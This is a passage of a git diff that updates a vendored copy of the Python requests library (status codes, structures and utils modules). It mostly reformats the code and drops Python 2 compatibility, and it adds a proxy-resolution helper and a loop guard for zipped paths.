-    303: ('see_other', 'other'),
-    304: ('not_modified',),
-    305: ('use_proxy',),
-    306: ('switch_proxy',),
-    307: ('temporary_redirect', 'temporary_moved', 'temporary'),
-    308: ('permanent_redirect',
-          'resume_incomplete', 'resume',),  # These 2 to be removed in 3.0
-
+    300: ("multiple_choices",),
+    301: ("moved_permanently", "moved", "\\o-"),
+    302: ("found",),
+    303: ("see_other", "other"),
+    304: ("not_modified",),
+    305: ("use_proxy",),
+    306: ("switch_proxy",),
+    307: ("temporary_redirect", "temporary_moved", "temporary"),
+    308: (
+        "permanent_redirect",
+        "resume_incomplete",
+        "resume",
+    ),  # "resume" and "resume_incomplete" to be removed in 3.0
     # Client Error.
-    400: ('bad_request', 'bad'),
-    401: ('unauthorized',),
-    402: ('payment_required', 'payment'),
-    403: ('forbidden',),
-    404: ('not_found', '-o-'),
-    405: ('method_not_allowed', 'not_allowed'),
-    406: ('not_acceptable',),
-    407: ('proxy_authentication_required', 'proxy_auth', 'proxy_authentication'),
-    408: ('request_timeout', 'timeout'),
-    409: ('conflict',),
-    410: ('gone',),
-    411: ('length_required',),
-    412: ('precondition_failed', 'precondition'),
-    413: ('request_entity_too_large',),
-    414: ('request_uri_too_large',),
-    415: ('unsupported_media_type', 'unsupported_media', 'media_type'),
-    416: ('requested_range_not_satisfiable', 'requested_range', 'range_not_satisfiable'),
-    417: ('expectation_failed',),
-    418: ('im_a_teapot', 'teapot', 'i_am_a_teapot'),
-    421: ('misdirected_request',),
-    422: ('unprocessable_entity', 'unprocessable'),
-    423: ('locked',),
-    424: ('failed_dependency', 'dependency'),
-    425: ('unordered_collection', 'unordered'),
-    426: ('upgrade_required', 'upgrade'),
-    428: ('precondition_required', 'precondition'),
-    429: ('too_many_requests', 'too_many'),
-    431: ('header_fields_too_large', 'fields_too_large'),
-    444: ('no_response', 'none'),
-    449: ('retry_with', 'retry'),
-    450: ('blocked_by_windows_parental_controls', 'parental_controls'),
-    451: ('unavailable_for_legal_reasons', 'legal_reasons'),
-    499: ('client_closed_request',),
-
+    400: ("bad_request", "bad"),
+    401: ("unauthorized",),
+    402: ("payment_required", "payment"),
+    403: ("forbidden",),
+    404: ("not_found", "-o-"),
+    405: ("method_not_allowed", "not_allowed"),
+    406: ("not_acceptable",),
+    407: ("proxy_authentication_required", "proxy_auth", "proxy_authentication"),
+    408: ("request_timeout", "timeout"),
+    409: ("conflict",),
+    410: ("gone",),
+    411: ("length_required",),
+    412: ("precondition_failed", "precondition"),
+    413: ("request_entity_too_large",),
+    414: ("request_uri_too_large",),
+    415: ("unsupported_media_type", "unsupported_media", "media_type"),
+    416: (
+        "requested_range_not_satisfiable",
+        "requested_range",
+        "range_not_satisfiable",
+    ),
+    417: ("expectation_failed",),
+    418: ("im_a_teapot", "teapot", "i_am_a_teapot"),
+    421: ("misdirected_request",),
+    422: ("unprocessable_entity", "unprocessable"),
+    423: ("locked",),
+    424: ("failed_dependency", "dependency"),
+    425: ("unordered_collection", "unordered"),
+    426: ("upgrade_required", "upgrade"),
+    428: ("precondition_required", "precondition"),
+    429: ("too_many_requests", "too_many"),
+    431: ("header_fields_too_large", "fields_too_large"),
+    444: ("no_response", "none"),
+    449: ("retry_with", "retry"),
+    450: ("blocked_by_windows_parental_controls", "parental_controls"),
+    451: ("unavailable_for_legal_reasons", "legal_reasons"),
+    499: ("client_closed_request",),
     # Server Error.
-    500: ('internal_server_error', 'server_error', '/o\\', '✗'),
-    501: ('not_implemented',),
-    502: ('bad_gateway',),
-    503: ('service_unavailable', 'unavailable'),
-    504: ('gateway_timeout',),
-    505: ('http_version_not_supported', 'http_version'),
-    506: ('variant_also_negotiates',),
-    507: ('insufficient_storage',),
-    509: ('bandwidth_limit_exceeded', 'bandwidth'),
-    510: ('not_extended',),
-    511: ('network_authentication_required', 'network_auth', 'network_authentication'),
+    500: ("internal_server_error", "server_error", "/o\\", "✗"),
+    501: ("not_implemented",),
+    502: ("bad_gateway",),
+    503: ("service_unavailable", "unavailable"),
+    504: ("gateway_timeout",),
+    505: ("http_version_not_supported", "http_version"),
+    506: ("variant_also_negotiates",),
+    507: ("insufficient_storage",),
+    509: ("bandwidth_limit_exceeded", "bandwidth"),
+    510: ("not_extended",),
+    511: ("network_authentication_required", "network_auth", "network_authentication"),
 }
 
-codes = LookupDict(name='status_codes')
+codes = LookupDict(name="status_codes")
+
 
 def _init():
     for code, titles in _codes.items():
         for title in titles:
             setattr(codes, title, code)
-            if not title.startswith(('\\', '/')):
+            if not title.startswith(("\\", "/")):
                 setattr(codes, title.upper(), code)
 
     def doc(code):
-        names = ', '.join('``%s``' % n for n in _codes[code])
-        return '* %d: %s' % (code, names)
+        names = ", ".join(f"``{n}``" for n in _codes[code])
+        return "* %d: %s" % (code, names)
 
     global __doc__
-    __doc__ = (__doc__ + '\n' +
-               '\n'.join(doc(code) for code in sorted(_codes))
-               if __doc__ is not None else None)
+    __doc__ = (
+        __doc__ + "\n" + "\n".join(doc(code) for code in sorted(_codes))
+        if __doc__ is not None
+        else None
+    )
+
 
 _init()
diff --git a/thirdparty/requests/structures.py b/thirdparty/requests/structures.py
index 8ee0ba7..188e13e 100644
--- a/thirdparty/requests/structures.py
+++ b/thirdparty/requests/structures.py
@@ -1,5 +1,3 @@
-# -*- coding: utf-8 -*-
-
 """
 requests.structures
 ~~~~~~~~~~~~~~~~~~~
@@ -64,11 +62,7 @@ def __len__(self):
 
     def lower_items(self):
         """Like iteritems(), but with all lowercase keys."""
-        return (
-            (lowerkey, keyval[1])
-            for (lowerkey, keyval)
-            in self._store.items()
-        )
+        return ((lowerkey, keyval[1]) for (lowerkey, keyval) in self._store.items())
 
     def __eq__(self, other):
         if isinstance(other, Mapping):
@@ -91,10 +85,10 @@ class LookupDict(dict):
 
     def __init__(self, name=None):
         self.name = name
-        super(LookupDict, self).__init__()
+        super().__init__()
 
     def __repr__(self):
-        return '<lookup \'%s\'>' % (self.name)
+        return f"<lookup '{self.name}'>"
 
     def __getitem__(self, key):
         # We allow fall-through here, so values default to None
diff --git a/thirdparty/requests/utils.py b/thirdparty/requests/utils.py
index dbb02a0..ad53583 100644
--- a/thirdparty/requests/utils.py
+++ b/thirdparty/requests/utils.py
@@ -1,5 +1,3 @@
-# -*- coding: utf-8 -*-
-
 """
 requests.utils
 ~~~~~~~~~~~~~~
@@ -20,27 +18,46 @@
 import warnings
 import zipfile
 from collections import OrderedDict
-from urllib3.util import make_headers
 
-from .__version__ import __version__
+from urllib3.util import make_headers, parse_url
+
 from . import certs
+from .__version__ import __version__
+
 # to_native_string is unused here, but imported here for backwards compatibility
-from ._internal_utils import to_native_string
+from ._internal_utils import HEADER_VALIDATORS, to_native_string  # noqa: F401
+from .compat import (
+    Mapping,
+    basestring,
+    bytes,
+    getproxies,
+    getproxies_environment,
+    integer_types,
+)
 from .compat import parse_http_list as _parse_list_header
 from .compat import (
-    quote, urlparse, bytes, str, unquote, getproxies,
-    proxy_bypass, urlunparse, basestring, integer_types, is_py3,
-    proxy_bypass_environment, getproxies_environment, Mapping)
+    proxy_bypass,
+    proxy_bypass_environment,
+    quote,
+    str,
+    unquote,
+    urlparse,
+    urlunparse,
+)
 from .cookies import cookiejar_from_dict
-from .structures import CaseInsensitiveDict
 from .exceptions import (
-    InvalidURL, InvalidHeader, FileModeWarning, UnrewindableBodyError)
+    FileModeWarning,
+    InvalidHeader,
+    InvalidURL,
+    UnrewindableBodyError,
+)
+from .structures import CaseInsensitiveDict
 
-NETRC_FILES = ('.netrc', '_netrc')
+NETRC_FILES = (".netrc", "_netrc")
 
 DEFAULT_CA_BUNDLE_PATH = certs.where()
 
-DEFAULT_PORTS = {'http': 80, 'https': 443}
+DEFAULT_PORTS = {"http": 80, "https": 443}
 
 # Ensure that ', ' is used to preserve previous delimiter behavior.
 DEFAULT_ACCEPT_ENCODING = ", ".join(
@@ -48,28 +65,25 @@
 )
 
 
-if sys.platform == 'win32':
+if sys.platform == "win32":
     # provide a proxy_bypass version on Windows without DNS lookups
 
     def proxy_bypass_registry(host):
         try:
-            if is_py3:
-                import winreg
-            else:
-                import _winreg as winreg
+            import winreg
         except ImportError:
             return False
 
         try:
-            internetSettings = winreg.OpenKey(winreg.HKEY_CURRENT_USER,
-                r'Software\Microsoft\Windows\CurrentVersion\Internet Settings')
+            internetSettings = winreg.OpenKey(
+                winreg.HKEY_CURRENT_USER,
+                r"Software\Microsoft\Windows\CurrentVersion\Internet Settings",
+            )
             # ProxyEnable could be REG_SZ or REG_DWORD, normalizing it
-            proxyEnable = int(winreg.QueryValueEx(internetSettings,
-                                              'ProxyEnable')[0])
+            proxyEnable = int(winreg.QueryValueEx(internetSettings, "ProxyEnable")[0])
             # ProxyOverride is almost always a string
-            proxyOverride = winreg.QueryValueEx(internetSettings,
-                                                'ProxyOverride')[0]
-        except OSError:
+            proxyOverride = winreg.QueryValueEx(internetSettings, "ProxyOverride")[0]
+        except (OSError, ValueError):
             return False
         if not proxyEnable or not proxyOverride:
             return False
@@ -77,15 +91,15 @@ def proxy_bypass_registry(host):
         # make a check value list from the registry entry: replace the
         # '<local>' string by the localhost entry and the corresponding
         # canonical entry.
-        proxyOverride = proxyOverride.split(';')
+        proxyOverride = proxyOverride.split(";")
         # now check if we match one of the registry values.
         for test in proxyOverride:
-            if test == '<local>':
-                if '.' not in host:
+            if test == "<local>":
+                if "." not in host:
                     return True
-            test = test.replace(".", r"\.")     # mask dots
-            test = test.replace("*", r".*")     # change glob sequence
-            test = test.replace("?", r".")      # change glob char
+            test = test.replace(".", r"\.")  # mask dots
+            test = test.replace("*", r".*")  # change glob sequence
+            test = test.replace("?", r".")  # change glob char
             if re.match(test, host, re.I):
                 return True
         return False
@@ -105,7 +119,7 @@ def proxy_bypass(host):  # noqa
 def dict_to_sequence(d):
     """Returns an internal sequence dictionary update."""
 
-    if hasattr(d, 'items'):
+    if hasattr(d, "items"):
         d = d.items()
 
     return d
@@ -115,37 +129,42 @@ def super_len(o):
     total_length = None
     current_position = 0
 
-    if hasattr(o, '__len__'):
+    if hasattr(o, "__len__"):
         total_length = len(o)
 
-    elif hasattr(o, 'len'):
+    elif hasattr(o, "len"):
         total_length = o.len
 
-    elif hasattr(o, 'fileno'):
+    elif hasattr(o, "fileno"):
         try:
             fileno = o.fileno()
-        except io.UnsupportedOperation:
+        except (io.UnsupportedOperation, AttributeError):
+            # AttributeError is a surprising exception, seeing as how we've just checked
+            # that `hasattr(o, 'fileno')`.  It happens for objects obtained via
+            # `Tarfile.extractfile()`, per issue 5229.
             pass
         else:
             total_length = os.fstat(fileno).st_size
 
             # Having used fstat to determine the file length, we need to
             # confirm that this file was opened up in binary mode.
-            if 'b' not in o.mode:
-                warnings.warn((
-                    "Requests has determined the content-length for this "
-                    "request using the binary size of the file: however, the "
-                    "file has been opened in text mode (i.e. without the 'b' "
-                    "flag in the mode). This may lead to an incorrect "
-                    "content-length. In Requests 3.0, support will be removed "
-                    "for files in text mode."),
-                    FileModeWarning
+            if "b" not in o.mode:
+                warnings.warn(
+                    (
+                        "Requests has determined the content-length for this "
+                        "request using the binary size of the file: however, the "
+                        "file has been opened in text mode (i.e. without the 'b' "
+                        "flag in the mode). This may lead to an incorrect "
+                        "content-length. In Requests 3.0, support will be removed "
+                        "for files in text mode."
+                    ),
+                    FileModeWarning,
                 )
 
-    if hasattr(o, 'tell'):
+    if hasattr(o, "tell"):
         try:
             current_position = o.tell()
-        except (OSError, IOError):
+        except OSError:
             # This can happen in some weird situations, such as when the file
             # is actually a special file descriptor like stdin. In this
             # instance, we don't know what the length is, so set it to zero and
@@ -153,8 +172,8 @@ def super_len(o):
             if total_length is not None:
                 current_position = total_length
         else:
-            if hasattr(o, 'seek') and total_length is None:
-                # StringIO and BytesIO have seek but no useable fileno
+            if hasattr(o, "seek") and total_length is None:
+                # StringIO and BytesIO have seek but no usable fileno
                 try:
                     # seek to end of file
                     o.seek(0, 2)
@@ -163,7 +182,7 @@ def super_len(o):
                     # seek back to current position to support
                     # partially read file-like objects
                     o.seek(current_position or 0)
-                except (OSError, IOError):
+                except OSError:
                     total_length = 0
 
     if total_length is None:
@@ -175,14 +194,14 @@ def super_len(o):
 def get_netrc_auth(url, raise_errors=False):
     """Returns the Requests tuple auth for a given url from netrc."""
 
-    netrc_file = os.environ.get('NETRC')
+    netrc_file = os.environ.get("NETRC")
     if netrc_file is not None:
         netrc_locations = (netrc_file,)
     else:
-        netrc_locations = ('~/{}'.format(f) for f in NETRC_FILES)
+        netrc_locations = (f"~/{f}" for f in NETRC_FILES)
 
     try:
-        from netrc import netrc, NetrcParseError
+        from netrc import NetrcParseError, netrc
 
         netrc_path = None
 
@@ -207,18 +226,18 @@ def get_netrc_auth(url, raise_errors=False):
 
         # Strip port numbers from netloc. This weird `if...encode`` dance is
         # used for Python 3.2, which doesn't support unicode literals.
-        splitstr = b':'
+        splitstr = b":"
         if isinstance(url, str):
-            splitstr = splitstr.decode('ascii')
+            splitstr = splitstr.decode("ascii")
         host = ri.netloc.split(splitstr)[0]
 
         try:
             _netrc = netrc(netrc_path).authenticators(host)
             if _netrc:
                 # Return with login / password
-                login_i = (0 if _netrc[0] else 1)
+                login_i = 0 if _netrc[0] else 1
                 return (_netrc[login_i], _netrc[2])
-        except (NetrcParseError, IOError):
+        except (NetrcParseError, OSError):
             # If there was a parsing error or a permissions issue reading the file,
             # we'll just skip netrc auth unless explicitly asked to raise errors.
             if raise_errors:
@@ -231,9 +250,8 @@ def get_netrc_auth(url, raise_errors=False):
 
 def guess_filename(obj):
     """Tries to guess the filename of the given object."""
-    name = getattr(obj, 'name', None)
-    if (name and isinstance(name, basestring) and name[0] != '<' and
-            name[-1] != '>'):
+    name = getattr(obj, "name", None)
+    if name and isinstance(name, basestring) and name[0] != "<" and name[-1] != ">":
         return os.path.basename(name)
 
 
@@ -251,7 +269,11 @@ def extract_zipped_paths(path):
     archive, member = os.path.split(path)
     while archive and not os.path.exists(archive):
         archive, prefix = os.path.split(archive)
-        member = '/'.join([prefix, member])
+        if not prefix:
+            # If we don't check for an empty prefix after the split (in other words, archive remains unchanged after the split),
+            # we _can_ end up in an infinite loop on a rare corner case affecting a small number of users
+            break
+        member = "/".join([prefix, member])
 
     if not zipfile.is_zipfile(archive):
         return path
@@ -262,7 +284,7 @@ def extract_zipped_paths(path):
 
     # we have a valid zip archive and a valid member of that archive
     tmp = tempfile.gettempdir()
-    extracted_path = os.path.join(tmp, member.split('/')[-1])
+    extracted_path = os.path.join(tmp, member.split("/")[-1])
     if not os.path.exists(extracted_path):
         # use read + write to avoid the creating nested folders, we only want the file, avoids mkdir racing condition
         with atomic_open(extracted_path) as file_handler:
@@ -273,12 +295,11 @@ def extract_zipped_paths(path):
 @contextlib.contextmanager
 def atomic_open(filename):
     """Write a file to the disk in an atomic fashion"""
-    replacer = os.rename if sys.version_info[0] == 2 else os.replace
     tmp_descriptor, tmp_name = tempfile.mkstemp(dir=os.path.dirname(filename))
     try:
-        with os.fdopen(tmp_descriptor, 'wb') as tmp_handler:
+        with os.fdopen(tmp_descriptor, "wb") as tmp_handler:
             yield tmp_handler
-        replacer(tmp_name, filename)
+        os.replace(tmp_name, filename)
     except BaseException:
         os.remove(tmp_name)
         raise
@@ -306,7 +327,7 @@ def from_key_val_list(value):
         return None
 
     if isinstance(value, (str, bytes, bool, int)):
-        raise ValueError('cannot encode objects that are not 2-tuples')
+        raise ValueError("cannot encode objects that are not 2-tuples")
 
     return OrderedDict(value)
 
@@ -332,7 +353,7 @@ def to_key_val_list(value):
         return None
 
     if isinstance(value, (str, bytes, bool, int)):
-        raise ValueError('cannot encode objects that are not 2-tuples')
+        raise ValueError("cannot encode objects that are not 2-tuples")
 
     if isinstance(value, Mapping):
         value = value.items()
@@ -397,10 +418,10 @@ def parse_dict_header(value):
     """
     result = {}
     for item in _parse_list_header(value):
-        if '=' not in item:
+        if "=" not in item:
             result[item] = None
             continue
-        name, value = item.split('=', 1)
+        name, value = item.split("=", 1)
         if value[:1] == value[-1:] == '"':
             value = unquote_header_value(value[1:-1])
         result[name] = value
@@ -428,8 +449,8 @@ def unquote_header_value(value, is_filename=False):
         # replace sequence below on a UNC path has the effect of turning
         # the leading double slash into a single slash and then
         # _fix_ie_filename() doesn't work correctly.  See #458.
-        if not is_filename or value[:2] != '\\\\':
-            return value.replace('\\\\', '\\').replace('\\"', '"')
+        if not is_filename or value[:2] != "\\\\":
+            return value.replace("\\\\", "\\").replace('\\"', '"')
     return value
 
 
@@ -464,19 +485,24 @@ def get_encodings_from_content(content):
 
     :param content: bytestring to extract encodings from.
     """
-    warnings.warn((
-        'In requests 3.0, get_encodings_from_content will be removed. For '
-        'more information, please see the discussion on issue #2266. (This'
-        ' warning should only appear once.)'),
-        DeprecationWarning)
+    warnings.warn(
+        (
+            "In requests 3.0, get_encodings_from_content will be removed. For "
+            "more information, please see the discussion on issue #2266. (This"
+            " warning should only appear once.)"
+        ),
+        DeprecationWarning,
+    )
 
     charset_re = re.compile(r'<meta.*?charset=["\']*(.+?)["\'>]', flags=re.I)
     pragma_re = re.compile(r'<meta.*?content=["\']*;?charset=(.+?)["\'>]', flags=re.I)
     xml_re = re.compile(r'^<\?xml.*?encoding=["\']*(.+?)["\'>]')
 
-    return (charset_re.findall(content) +
-            pragma_re.findall(content) +
-            xml_re.findall(content))
+    return (
+        charset_re.findall(content)
+        + pragma_re.findall(content)
+        + xml_re.findall(content)
+    )
 
 
 def _parse_content_type_header(header):
@@ -487,7 +513,7 @@ def _parse_content_type_header(header):
          parameters
     """
 
-    tokens = header.split(';')
+    tokens = header.split(";")
     content_type, params = tokens[0].strip(), tokens[1:]
     params_dict = {}
     items_to_strip = "\"' "
@@ -499,7 +525,7 @@ def _parse_content_type_header(header):
             index_of_equals = param.find("=")
             if index_of_equals != -1:
                 key = param[:index_of_equals].strip(items_to_strip)
-                value = param[index_of_equals + 1:].strip(items_to_strip)
+                value = param[index_of_equals + 1 :].strip(items_to_strip)
             params_dict[key.lower()] = value
     return content_type, params_dict
 
@@ -511,38 +537,37 @@ def get_encoding_from_headers(headers):
     :rtype: str
     """
 
-    content_type = headers.get('content-type')
+    content_type = headers.get("content-type")
 
     if not content_type:
         return None
 
     content_type, params = _parse_content_type_header(content_type)
 
-    if 'charset' in params:
-        return params['charset'].strip("'\"")
+    if "charset" in params:
+        return params["charset"].strip("'\"")
 
-    if 'text' in content_type:
-        return 'ISO-8859-1'
+    if "text" in content_type:
+        return "ISO-8859-1"
 
-    if 'application/json' in content_type:
+    if "application/json" in content_type:
         # Assume UTF-8 based on RFC 4627: https://www.ietf.org/rfc/rfc4627.txt since the charset was unset
-        return 'utf-8'
+        return "utf-8"
 
 
 def stream_decode_response_unicode(iterator, r):
-    """Stream decodes a iterator."""
+    """Stream decodes an iterator."""
 
     if r.encoding is None:
-        for item in iterator:
-            yield item
+        yield from iterator
         return
 
-    decoder = codecs.getincrementaldecoder(r.encoding)(errors='replace')
+    decoder = codecs.getincrementaldecoder(r.encoding)(errors="replace")
     for chunk in iterator:
         rv = decoder.decode(chunk)
         if rv:
             yield rv
-    rv = decoder.decode(b'', final=True)
+    rv = decoder.decode(b"", final=True)
     if rv:
         yield rv
 
@@ -553,7 +578,7 @@ def iter_slices(string, slice_length):
     if slice_length is None or slice_length <= 0:
         slice_length = len(string)
     while pos < len(string):
-        yield string[pos:pos + slice_length]
+        yield string[pos : pos + slice_length]
         pos += slice_length
 
 
@@ -569,11 +594,14 @@ def get_unicode_from_response(r):
 
     :rtype: str
     """
-    warnings.warn((
-        'In requests 3.0, get_unicode_from_response will be removed. For '
-        'more information, please see the discussion on issue #2266. (This'
-        ' warning should only appear once.)'),
-        DeprecationWarning)
+    warnings.warn(
+        (
+            "In requests 3.0, get_unicode_from_response will be removed. For "
+            "more information, please see the discussion on issue #2266. (This"
+            " warning should only appear once.)"
+        ),
+        DeprecationWarning,
+    )
 
     tried_encodings = []
 
@@ -588,14 +616,15 @@ def get_unicode_from_response(r):
 
     # Fall back:
     try:
-        return str(r.content, encoding, errors='replace')
+        return str(r.content, encoding, errors="replace")
     except TypeError:
         return r.content
 
 
 # The unreserved URI characters (RFC 3986)
 UNRESERVED_SET = frozenset(
-    "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" + "0123456789-._~")
+    "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" + "0123456789-._~"
+)
 
 
 def unquote_unreserved(uri):
@@ -604,22 +633,22 @@ def unquote_unreserved(uri):
 
     :rtype: str
     """
-    parts = uri.split('%')
+    parts = uri.split("%")
     for i in range(1, len(parts)):
         h = parts[i][0:2]
         if len(h) == 2 and h.isalnum():
             try:
                 c = chr(int(h, 16))
             except ValueError:
-                raise InvalidURL("Invalid percent-escape sequence: '%s'" % h)
+                raise InvalidURL(f"Invalid percent-escape sequence: '{h}'")
 
             if c in UNRESERVED_SET:
                 parts[i] = c + parts[i][2:]
             else:
-                parts[i] = '%' + parts[i]
+                parts[i] = f"%{parts[i]}"
         else:
-            parts[i] = '%' + parts[i]
-    return ''.join(parts)
+            parts[i] = f"%{parts[i]}"
+    return "".join(parts)
 
 
 def requote_uri(uri):
@@ -652,10 +681,10 @@ def address_in_network(ip, net):
 
     :rtype: bool
     """
-    ipaddr = struct.unpack('=L', socket.inet_aton(ip))[0]
-    netaddr, bits = net.split('/')
-    netmask = struct.unpack('=L', socket.inet_aton(dotted_netmask(int(bits))))[0]
-    network = struct.unpack('=L', socket.inet_aton(netaddr))[0] & netmask
+    ipaddr = struct.unpack("=L", socket.inet_aton(ip))[0]
+    netaddr, bits = net.split("/")
+    netmask = struct.unpack("=L", socket.inet_aton(dotted_netmask(int(bits))))[0]
+    network = struct.unpack("=L", socket.inet_aton(netaddr))[0] & netmask
     return (ipaddr & netmask) == (network & netmask)
 
 
@@ -666,8 +695,8 @@ def dotted_netmask(mask):
 
     :rtype: str
     """
-    bits = 0xffffffff ^ (1 << 32 - mask) - 1
-    return socket.inet_ntoa(struct.pack('>I', bits))
+    bits = 0xFFFFFFFF ^ (1 << 32 - mask) - 1
+    return socket.inet_ntoa(struct.pack(">I", bits))
 
 
 def is_ipv4_address(string_ip):
@@ -676,7 +705,7 @@ def is_ipv4_address(string_ip):
     """
     try:
         socket.inet_aton(string_ip)
-    except socket.error:
+    except OSError:
         return False
     return True
 
@@ -687,9 +716,9 @@ def is_valid_cidr(string_network):
 
     :rtype: bool
     """
-    if string_network.count('/') == 1:
+    if string_network.count("/") == 1:
         try:
-            mask = int(string_network.split('/')[1])
+            mask = int(string_network.split("/")[1])
         except ValueError:
             return False
 
@@ -697,8 +726,8 @@ def is_valid_cidr(string_network):
             return False
 
         try:
-            socket.inet_aton(string_network.split('/')[0])
-        except socket.error:
+            socket.inet_aton(string_network.split("/")[0])
+        except OSError:
             return False
     else:
         return False
@@ -735,13 +764,14 @@ def should_bypass_proxies(url, no_proxy):
     """
     # Prioritize lowercase environment variables over uppercase
     # to keep a consistent behaviour with other http projects (curl, wget).
-    get_proxy = lambda k: os.environ.get(k) or os.environ.get(k.upper())
+    def get_proxy(key):
+        return os.environ.get(key) or os.environ.get(key.upper())
 
     # First check whether no_proxy is defined. If it is, check that the URL
     # we're getting isn't in the no_proxy list.
     no_proxy_arg = no_proxy
     if no_proxy is None:
-        no_proxy = get_proxy('no_proxy')
+        no_proxy = get_proxy("no_proxy")
     parsed = urlparse(url)
 
     if parsed.hostname is None:
@@ -751,9 +781,7 @@ def should_bypass_proxies(url, no_proxy):
     if no_proxy:
         # We need to check whether we match here. We need to see if we match
         # the end of the hostname, both with and without the port.
-        no_proxy = (
-            host for host in no_proxy.replace(' ', '').split(',') if host
-        )
+        no_proxy = (host for host in no_proxy.replace(" ", "").split(",") if host)
 
         if is_ipv4_address(parsed.hostname):
             for proxy_ip in no_proxy:
@@ -767,7 +795,7 @@ def should_bypass_proxies(url, no_proxy):
         else:
             host_with_port = parsed.hostname
             if parsed.port:
-                host_with_port += ':{}'.format(parsed.port)
+                host_with_port += f":{parsed.port}"
 
             for host in no_proxy:
                 if parsed.hostname.endswith(host) or host_with_port.endswith(host):
@@ -775,7 +803,7 @@ def should_bypass_proxies(url, no_proxy):
                     # to apply the proxies on this URL.
                     return True
 
-    with set_environ('no_proxy', no_proxy_arg):
+    with set_environ("no_proxy", no_proxy_arg):
         # parsed.hostname can be `None` in cases such as a file URI.
         try:
             bypass = proxy_bypass(parsed.hostname)
@@ -809,13 +837,13 @@ def select_proxy(url, proxies):
     proxies = proxies or {}
     urlparts = urlparse(url)
     if urlparts.hostname is None:
-        return proxies.get(urlparts.scheme, proxies.get('all'))
+        return proxies.get(urlparts.scheme, proxies.get("all"))
 
     proxy_keys = [
-        urlparts.scheme + '://' + urlparts.hostname,
+        urlparts.scheme + "://" + urlparts.hostname,
         urlparts.scheme,
-        'all://' + urlparts.hostname,
-        'all',
+        "all://" + urlparts.hostname,
+        "all",
     ]
     proxy = None
     for proxy_key in proxy_keys:
@@ -826,25 +854,54 @@ def select_proxy(url, proxies):
     return proxy
 
 
+def resolve_proxies(request, proxies, trust_env=True):
+    """This method takes proxy information from a request and configuration
+    input to resolve a mapping of target proxies. This will consider settings
+    such a NO_PROXY to strip proxy configurations.
+
+    :param request: Request or PreparedRequest
+    :param proxies: A dictionary of schemes or schemes and hosts to proxy URLs
+    :param trust_env: Boolean declaring whether to trust environment configs
+
+    :rtype: dict
+    """
+    proxies = proxies if proxies is not None else {}
+    url = request.url
+    scheme = urlparse(url).scheme
+    no_proxy = proxies.get("no_proxy")
+    new_proxies = proxies.copy()
+
+    if trust_env and not should_bypass_proxies(url, no_proxy=no_proxy):
+        environ_proxies = get_environ_proxies(url, no_proxy=no_proxy)
+
+        proxy = environ_proxies.get(scheme, environ_proxies.get("all"))
+
+        if proxy:
+            new_proxies.setdefault(scheme, proxy)
+    return new_proxies
+
+
 def default_user_agent(name="python-requests"):
     """
     Return a string representing the default user agent.
 
     :rtype: str
     """
-    return '%s/%s' % (name, __version__)
+    return f"{name}/{__version__}"
 
 
 def default_headers():
     """
     :rtype: requests.structures.CaseInsensitiveDict
     """
-    return CaseInsensitiveDict({
-        'User-Agent': default_user_agent(),
-        'Accept-Encoding': DEFAULT_ACCEPT_ENCODING,
-        'Accept': '*/*',
-        'Connection': 'keep-alive',
-    })
+    return CaseInsensitiveDict(
+        {
+            "User-Agent": default_user_agent(),
+            "Accept-Encoding": DEFAULT_ACCEPT_ENCODING,
+            "Accept": "*/*",
+            "Connection": "keep-alive",
+        }
+    )
 
 
 def parse_header_links(value):
@@ -857,23 +914,23 @@ def parse_header_links(value):
 
     links = []
 
-    replace_chars = ' \'"'
+    replace_chars = " '\""
 
     value = value.strip(replace_chars)
     if not value:
         return links
 
-    for val in re.split(', *<', value):
+    for val in re.split(", *<", value):
         try:
-            url, params = val.split(';', 1)
+            url, params = val.split(";", 1)
         except ValueError:
-            url, params = val, ''
+            url, params = val, ""
 
-        link = {'url': url.strip('<> \'"')}
+        link = {"url": url.strip("<> '\"")}
 
-        for param in params.split(';'):
+        for param in params.split(";"):
             try:
-                key, value = param.split('=')
+                key, value = param.split("=")
             except ValueError:
                 break
 
@@ -885,7 +942,7 @@ def parse_header_links(value):
 
 
 # Null bytes; no need to recreate these on each call to guess_json_utf
-_null = '\x00'.encode('ascii')  # encoding to ASCII for Python 3
+_null = "\x00".encode("ascii")  # encoding to ASCII for Python 3
 _null2 = _null * 2
 _null3 = _null * 3
 
@@ -899,25 +956,25 @@ def guess_json_utf(data):
     # determine the encoding. Also detect a BOM, if present.
     sample = data[:4]
     if sample in (codecs.BOM_UTF32_LE, codecs.BOM_UTF32_BE):
-        return 'utf-32'     # BOM included
+        return "utf-32"  # BOM included
     if sample[:3] == codecs.BOM_UTF8:
-        return 'utf-8-sig'  # BOM included, MS style (discouraged)
+        return "utf-8-sig"  # BOM included, MS style (discouraged)
     if sample[:2] in (codecs.BOM_UTF16_LE, codecs.BOM_UTF16_BE):
-        return 'utf-16'     # BOM included
+        return "utf-16"  # BOM included
     nullcount = sample.count(_null)
     if nullcount == 0:
-        return 'utf-8'
+        return "utf-8"
     if nullcount == 2:
-        if sample[::2] == _null2:   # 1st and 3rd are null
-            return 'utf-16-be'
+        if sample[::2] == _null2:  # 1st and 3rd are null
+            return "utf-16-be"
         if sample[1::2] == _null2:  # 2nd and 4th are null
-            return 'utf-16-le'
+            return "utf-16-le"
         # Did not detect 2 valid UTF-16 ascii-range characters
     if nullcount == 3:
         if sample[:3] == _null3:
-            return 'utf-32-be'
+            return "utf-32-be"
         if sample[1:] == _null3:
-            return 'utf-32-le'
+            return "utf-32-le"
         # Did not detect a valid UTF-32 ascii-range character
     return None
 
@@ -928,15 +985,27 @@ def prepend_scheme_if_needed(url, new_scheme):
 
     :rtype: str
     """
-    scheme, netloc, path, params, query, fragment = urlparse(url, new_scheme)
-
-    # urlparse is a finicky beast, and sometimes decides that there isn't a
-    # netloc present. Assume that it's being over-cautious, and switch netloc
-    # and path if urlparse decided there was no netloc.
+    parsed = parse_url(url)
+    scheme, auth, host, port, path, query, fragment = parsed
+
+    # A defect in urlparse determines that there isn't a netloc present in some
+    # urls. We previously assumed parsing was overly cautious, and swapped the
+    # netloc and path. Due to a lack of tests on the original defect, this is
+    # maintained with parse_url for backwards compatibility.
+    netloc = parsed.netloc
     if not netloc:
         netloc, path = path, netloc
 
-    return urlunparse((scheme, netloc, path, params, query, fragment))
+    if auth:
+        # parse_url doesn't provide the netloc with auth
+        # so we'll add it ourselves.
+        netloc = "@".join([auth, netloc])
+    if scheme is None:
+        scheme = new_scheme
+    if path is None:
+        path = ""
+
